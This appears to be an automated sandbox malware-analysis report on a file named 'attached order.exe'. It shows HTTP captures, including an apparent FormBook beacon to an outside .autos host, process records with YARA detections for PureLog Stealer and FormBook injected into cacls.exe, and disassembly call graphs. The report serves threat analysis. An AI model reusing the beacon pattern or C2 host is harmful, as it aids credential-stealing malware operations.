                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:15.704008102 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                        Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                        Nov 27, 2024 11:30:15.704205036 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                        Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                        Nov 27, 2024 11:30:15.704245090 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                        Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                        Nov 27, 2024 11:30:15.704267025 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                        Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                        Nov 27, 2024 11:30:15.704437017 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                        Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                        Nov 27, 2024 11:30:15.704519987 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                        Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                        Nov 27, 2024 11:30:15.704554081 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                        Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                        Nov 27, 2024 11:30:15.704574108 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                        Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        20192.168.11.204976543.163.1.11080
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:19.382648945 CET412OUTGET /pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:30:19.722738981 CET1289INHTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:19 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:19.722843885 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                        Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                        Nov 27, 2024 11:30:19.722918034 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                        Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                        Nov 27, 2024 11:30:19.722961903 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                        Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                        Nov 27, 2024 11:30:19.723009109 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                        Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                        Nov 27, 2024 11:30:19.723093033 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                        Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                        Nov 27, 2024 11:30:19.723129988 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                        Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                        Nov 27, 2024 11:30:19.723191977 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                        Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                        Nov 27, 2024 11:30:19.723236084 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                        Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                        Nov 27, 2024 11:30:19.724384069 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                        Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                        Nov 27, 2024 11:30:20.060621977 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                        Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:05:28:08
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0xed0000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.16558585775.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:05:28:11
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0x50000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:05:28:11
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Users\user\Desktop\attached order.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\attached order.exe"
                                                                                        Imagebase:0xa70000
                                                                                        File size:1'044'992 bytes
                                                                                        MD5 hash:0879125FD7B75F462BC11EAEBDB28445
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:05:28:36
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                        Imagebase:0x140000000
                                                                                        File size:16'696'840 bytes
                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:05:28:37
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                        Imagebase:0xb30000
                                                                                        File size:27'648 bytes
                                                                                        MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:05:29:02
                                                                                        Start date:27/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff745780000
                                                                                        File size:597'432 bytes
                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:11.6%
                                                                                          Dynamic/Decrypted Code Coverage:95.2%
                                                                                          Signature Coverage:3.5%
                                                                                          Total number of Nodes:373
                                                                                          Total number of Limit Nodes:22
                                                                                          execution_graph 46603 5a32f20 DuplicateHandle 46604 5a32fb6 46603->46604 46950 9e5abc6 46951 9e5abc8 CloseHandle 46950->46951 46952 9e5ac2f 46951->46952 46953 5a30950 46954 5a3095f 46953->46954 46956 5a30a48 46953->46956 46957 5a30a59 46956->46957 46958 5a30a7c 46956->46958 46963 5a30a48 GetModuleHandleW 46957->46963 46964 5a30c38 46957->46964 46958->46954 46959 5a30c80 GetModuleHandleW 46960 5a30cad 46959->46960 46960->46954 46961 5a30a64 46961->46958 46961->46959 46963->46961 46965 5a30c80 GetModuleHandleW 46964->46965 46966 5a30c7a 46964->46966 46967 5a30cad 46965->46967 46966->46965 46967->46961 46968 5a37490 46969 5a374f8 CreateWindowExW 46968->46969 46971 5a375b4 46969->46971 46605 9e57a20 46606 9e57a5a 46605->46606 46607 9e57ad6 46606->46607 46608 9e57aeb 46606->46608 46613 9e55e94 46607->46613 46610 9e55e94 2 API calls 46608->46610 46611 9e57afa 46610->46611 46614 9e55e9f 46613->46614 46615 9e57ae1 46614->46615 46617 9e58440 46614->46617 46623 9e55edc 46617->46623 46619 9e58467 46619->46615 46621 9e5847f CreateIconFromResourceEx 46622 9e5850e 46621->46622 46622->46615 46624 9e58490 CreateIconFromResourceEx 46623->46624 46625 9e5845a 46624->46625 46625->46619 46625->46621 46711 a3213aa 46713 a3211c1 46711->46713 46712 a3212d8 46712->46712 46713->46712 46717 a321bb8 46713->46717 46739 a321c1e 46713->46739 46762 a321ba8 46713->46762 46718 a321bd2 46717->46718 46719 a321bda 46718->46719 46784 a321fb3 46718->46784 46793 a32256d 46718->46793 46798 a322a69 46718->46798 46803 a322749 46718->46803 46808 a322385 46718->46808 46812 a321f24 46718->46812 46822 a3221a7 46718->46822 46827 a3223e6 46718->46827 46832 a3228a1 46718->46832 46837 a3221dd 46718->46837 46841 a32225d 46718->46841 46846 a32217f 46718->46846 46851 a32299e 46718->46851 46856 a32247e 46718->46856 46867 a32227e 46718->46867 46874 a322139 46718->46874 46879 a32201b 46718->46879 46889 a3222b7 46718->46889 46897 a322411 46718->46897 46719->46712 46740 a321bac 46739->46740 46741 a321c21 46739->46741 46742 a321bda 46740->46742 46743 a321fb3 4 API calls 46740->46743 46744 a322411 2 API calls 46740->46744 46745 a3222b7 4 API calls 46740->46745 46746 a32201b 4 API calls 46740->46746 46747 a322139 2 API calls 46740->46747 46748 a32227e 4 API calls 46740->46748 46749 a32247e 6 API calls 46740->46749 46750 a32299e 2 API calls 46740->46750 46751 a32217f 2 API calls 46740->46751 46752 a32225d 2 API calls 46740->46752 46753 a3221dd 2 API calls 46740->46753 46754 a3228a1 2 API calls 46740->46754 46755 a3223e6 2 API calls 46740->46755 46756 a3221a7 2 API calls 46740->46756 46757 a321f24 4 API calls 46740->46757 46758 a322385 2 API calls 46740->46758 46759 a322749 2 API calls 46740->46759 46760 a322a69 2 API calls 46740->46760 46761 a32256d 2 API calls 46740->46761 46741->46712 46742->46712 46743->46742 46744->46742 46745->46742 46746->46742 46747->46742 46748->46742 46749->46742 46750->46742 46751->46742 46752->46742 46753->46742 46754->46742 46755->46742 46756->46742 46757->46742 46758->46742 46759->46742 46760->46742 46761->46742 46763 a321bab 46762->46763 46764 a321bda 46763->46764 46765 a321fb3 4 API calls 46763->46765 46766 